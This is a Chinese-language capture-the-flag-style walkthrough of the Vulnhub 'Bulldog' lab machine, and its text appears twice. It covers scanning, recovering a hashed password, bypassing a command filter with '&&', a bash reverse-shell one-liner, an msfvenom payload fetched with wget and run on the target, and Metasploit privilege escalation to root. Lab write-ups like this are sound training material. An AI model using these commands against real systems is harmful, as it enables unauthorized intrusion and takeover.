简单打靶场之bulldog
字数 1126 2025-08-12 11:34:37

Bulldog靶场渗透测试教学文档

0x01 环境搭建

靶场下载

  • 下载地址: https://www.vulnhub.com/entry/bulldog-1,211/
  • 靶机类型: Vulnhub虚拟机

常见问题解决

  • IP地址获取问题: 参考《vulnhub靶机无法获取IP地址解决办法》(redwand的博客-CSDN博客)

0x02 靶场渗透流程

1. 主机发现

sudo netdiscover -r 192.168.91.0/24

发现靶机IP: 192.168.91.156

2. 端口扫描

nmap -T4 -sC -sV -p- 192.168.91.156

使用Nmap进行全端口扫描,获取服务信息

3. 辅助扫描工具

  • fscan: fscan32.exe -h 192.168.91.156
  • Goby: 图形化扫描工具

4. Web目录扫描

使用dirsearch发现有用路径:

  • http://192.168.91.156/dev/
  • http://192.168.91.156/robots.txt
  • http://192.168.91.156/admin/login

5. 信息收集

  • 访问/dev/目录并查看源代码
  • 发现员工邮箱和MD5加密的密码注释
  • 使用cmd5.com在线解密MD5密码

6. 登录尝试

  • 使用账号: nick
  • 密码: bulldog (解密获得)
  • 成功登录: http://192.168.91.156:8080/admin/

7. WebShell绕过

  • 输入框有命令限制,非允许命令会显示"黑客行为"
  • 使用&符号绕过: ls&&whoami

8. 反弹Shell尝试

# Kali监听
nc -nlvp 6666

# 尝试URL编码后的反弹Shell命令
echo "bash -i >& /dev/tcp/192.168.91.156/6666 0>&1" | bash

失败,返回500错误

9. MSF后门利用

# 生成Linux后门
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.91.154 LPORT=4444 -f elf > shell.elf

# 启动HTTP服务
python -m http.server 8080

# MSF监听设置
use exploit/multi/handler
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.91.154
set LPORT 4444
run

10. 靶机下载执行

# URL编码后执行
pwd&wget http://192.168.91.154:8080/shell.elf
pwd&&chmod +x shell.elf
pwd&&./shell.elf

成功获取Meterpreter会话

11. 提权

# 查找可用提权模块
run post/multi/recon/local_exploit_suggester

# 发现多个漏洞:
1. exploit/linux/local/bpf_sign_extension_priv_esc
2. exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
3. exploit/linux/local/glibc_realpath_priv_esc
4. exploit/linux/local/pkexec
5. exploit/linux/local/su_login

# 使用第一个漏洞提权
use exploit/linux/local/bpf_sign_extension_priv_esc
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set session 2
run

成功提权至root

0x03 经验总结

  1. 源代码检查: 在dirsearch扫描后,查看网页源代码发现关键信息(MD5加密密码)
  2. 命令绕过技巧: 使用&符号绕过受限命令执行
  3. 多种渗透途径: 当直接反弹Shell失败时,采用MSF后门方式成功获取控制权
  4. 自动化工具辅助: 使用local_exploit_suggester快速识别可用提权漏洞

关键知识点

  1. 信息收集: 网络扫描、目录爆破、源代码审查
  2. 密码破解: MD5在线解密
  3. Web应用绕过: 受限命令执行绕过技术
  4. 后门利用: MSFVenom生成、传输和执行
  5. 权限提升: Linux本地提权漏洞利用

工具清单

  • 网络扫描: netdiscover, nmap
  • Web扫描: dirsearch, fscan, Goby
  • 密码破解: cmd5.com
  • 后门生成: msfvenom
  • 监听控制: nc, Metasploit
  • 提权检测: local_exploit_suggester
Bulldog靶场渗透测试教学文档 0x01 环境搭建 靶场下载 下载地址: https://www.vulnhub.com/entry/bulldog-1,211/ 靶机类型: Vulnhub虚拟机 常见问题解决 IP地址获取问题 : 参考《vulnhub靶机无法获取IP地址解决办法》(redwand的博客-CSDN博客) 0x02 靶场渗透流程 1. 主机发现 发现靶机IP: 192.168.91.156 2. 端口扫描 使用Nmap进行全端口扫描,获取服务信息 3. 辅助扫描工具 fscan : fscan32.exe -h 192.168.91.156 Goby : 图形化扫描工具 4. Web目录扫描 使用dirsearch发现有用路径: http://192.168.91.156/dev/ http://192.168.91.156/robots.txt http://192.168.91.156/admin/login 5. 信息收集 访问/dev/目录并查看源代码 发现员工邮箱和MD5加密的密码注释 使用cmd5.com在线解密MD5密码 6. 登录尝试 使用账号: nick 密码: bulldog (解密获得) 成功登录: http://192.168.91.156:8080/admin/ 7. WebShell绕过 输入框有命令限制,非允许命令会显示"黑客行为" 使用 & 符号绕过: ls&&whoami 8. 反弹Shell尝试 失败,返回500错误 9. MSF后门利用 10. 靶机下载执行 成功获取Meterpreter会话 11. 提权 成功提权至root 0x03 经验总结 源代码检查 : 在dirsearch扫描后,查看网页源代码发现关键信息(MD5加密密码) 命令绕过技巧 : 使用 & 符号绕过受限命令执行 多种渗透途径 : 当直接反弹Shell失败时,采用MSF后门方式成功获取控制权 自动化工具辅助 : 使用local_ exploit_ suggester快速识别可用提权漏洞 关键知识点 信息收集 : 网络扫描、目录爆破、源代码审查 密码破解 : MD5在线解密 Web应用绕过 : 受限命令执行绕过技术 后门利用 : MSFVenom生成、传输和执行 权限提升 : Linux本地提权漏洞利用 工具清单 网络扫描: netdiscover, nmap Web扫描: dirsearch, fscan, Goby 密码破解: cmd5.com 后门生成: msfvenom 监听控制: nc, Metasploit 提权检测: local_ exploit_ suggester